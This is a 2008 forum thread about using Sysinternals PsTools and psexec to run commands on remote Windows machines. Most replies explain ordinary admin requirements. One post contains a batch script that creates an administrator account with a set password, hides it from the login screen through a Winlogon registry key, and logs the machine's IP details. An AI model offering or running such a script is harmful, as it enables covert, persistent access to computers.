ZeroBeat Posted December 8, 2008 Share Posted December 8, 2008 Well this may sound like a noob question, but I'm currently running Linux, so I am not able to try this out myself. I have looked a little at the SysInternal tool "PsTools" for remotely running commands, on different computers. I can easily so how I am suppose to use it, but does anyone know what it requires on the other side, I guess you would need some kind of access to the remote user, to avoid you from just running whatever en an entire network, or is it simply just the script kitties wet dream? Anybody had any experience with it? Quote Link to comment Share on other sites More sharing options...
Timmo Posted December 8, 2008 Share Posted December 8, 2008 i haven't look at PsTools but for running commands remotely u need to be authenticated to the remote machine as administrator or have the same privs. personally i use autoit scripting language (found at www.autoit.com) to create gui interface to run remote commands using WMI. hope this helps Quote Link to comment Share on other sites More sharing options...
ZeroBeat Posted December 8, 2008 Author Share Posted December 8, 2008 Thanks thought so too, but looking through technet's web page I could not find a single information about that. Quote Link to comment Share on other sites More sharing options...
X3N Posted December 8, 2008 Share Posted December 8, 2008 psexec you need admin privelegest to run over the network... pstools is a set of tools that do a bunch of really cool stuff... has nothing to do with script kiddies Quote Link to comment Share on other sites More sharing options...
VaKo Posted December 8, 2008 Share Posted December 8, 2008 TechNet: PStools PsTools Primer Quote Link to comment Share on other sites More sharing options...
ZeroBeat Posted December 8, 2008 Author Share Posted December 8, 2008 psexec you need admin privelegest to run over the network... pstools is a set of tools that do a bunch of really cool stuff... has nothing to do with script kiddies I know it is for network administration, and have looked through it, I just got concerned, when it did not appear anyway on the technet webpage, that it was meant as a tool for corporate networks Quote Link to comment Share on other sites More sharing options...
aeturnus Posted December 9, 2008 Share Posted December 9, 2008 Well this may sound like a noob question, but I'm currently running Linux, so I am not able to try this out myself. I have looked a little at the SysInternal tool "PsTools" for remotely running commands, on different computers. I can easily so how I am suppose to use it, but does anyone know what it requires on the other side, I guess you would need some kind of access to the remote user, to avoid you from just running whatever en an entire network, or is it simply just the script kitties wet dream? Anybody had any experience with it? I think this has been mentioned, but you're looking for "psexec". To run it you require Administrator privileges on the remote computer and access to the remote computers ADMIN$ share. Quote Link to comment Share on other sites More sharing options...
ZeroBeat Posted December 9, 2008 Author Share Posted December 9, 2008 I think this has been mentioned, but you're looking for "psexec". To run it you require Administrator privileges on the remote computer and access to the remote computers ADMIN$ share. So something like this might do the trick? (Batch file in case someone would not know ;)) @echo off set DEST=. set USER=RemoteSys set PASS=mypassword cls # Creates the registry tweaks for hiding the user ECHO REGEDIT4 > "regpatch.reg" ECHO. >> "regpatch.reg" ECHO HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList >> "regpatch.reg" ECHO "%USER%"="dword:00000001">> "regpatch.reg" ECHO. >> "regpatch.reg" # Creates the user and tries to add it to the admin group echo Setting up remote acces for user: %USERNAME% > "%DEST%\log-%USERNAME%.txt" net user %USER% %PASS% /add >> "%DEST%\log-%USERNAME%.txt" net localgroup Adminstratorer %USER% /ADD >> "%DEST%\log-%USERNAME%.txt" net localgroup Adminstrators %USER% /ADD >> "%DEST%\log-%USERNAME%.txt" regedit /S regpatch.reg >> "%DEST%\log-%USERNAME%.txt" # Cleaning up del regpatch.reg # Saves the information to the disired location ipconfig >> "%DEST%\ip-%USERNAME%.txt" Or am I totally of? Quote Link to comment Share on other sites More sharing options...
aeturnus Posted December 9, 2008 Share Posted December 9, 2008 I think that'll work to get you an account on that machine as an Admin. What's curious to me, though, since my scripting is a bit rusty: Why do you need that cls on the 5th line if @echo off has all ready executed? Quote Link to comment Share on other sites More sharing options...
ZeroBeat Posted December 9, 2008 Author Share Posted December 9, 2008 I think that'll work to get you an account on that machine as an Admin. What's curious to me, though, since my scripting is a bit rusty: Why do you need that cls on the 5th line if @echo off has all ready executed? Well echo off only prevents the input from being shown, output is still shown. Quote Link to comment Share on other sites More sharing options...
aeturnus Posted December 9, 2008 Share Posted December 9, 2008 Ah, make sense. Thanks :) Quote Link to comment Share on other sites More sharing options...
c0der3d Posted December 16, 2008 Share Posted December 16, 2008 PSTools is designed to manage a large group of Window's machines. I use this on a daily basis. It allows you execute remote commands to Window's PCs that you have access to. For example, I have some vbscripts that run automation for me. I can remotely tell my automation system to begin the test by executing PS tools: cmd > psexec \\automation -u administrator -p password "c:\startAutomation.bat" You can also use them to reboot, gather information about the system etc. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.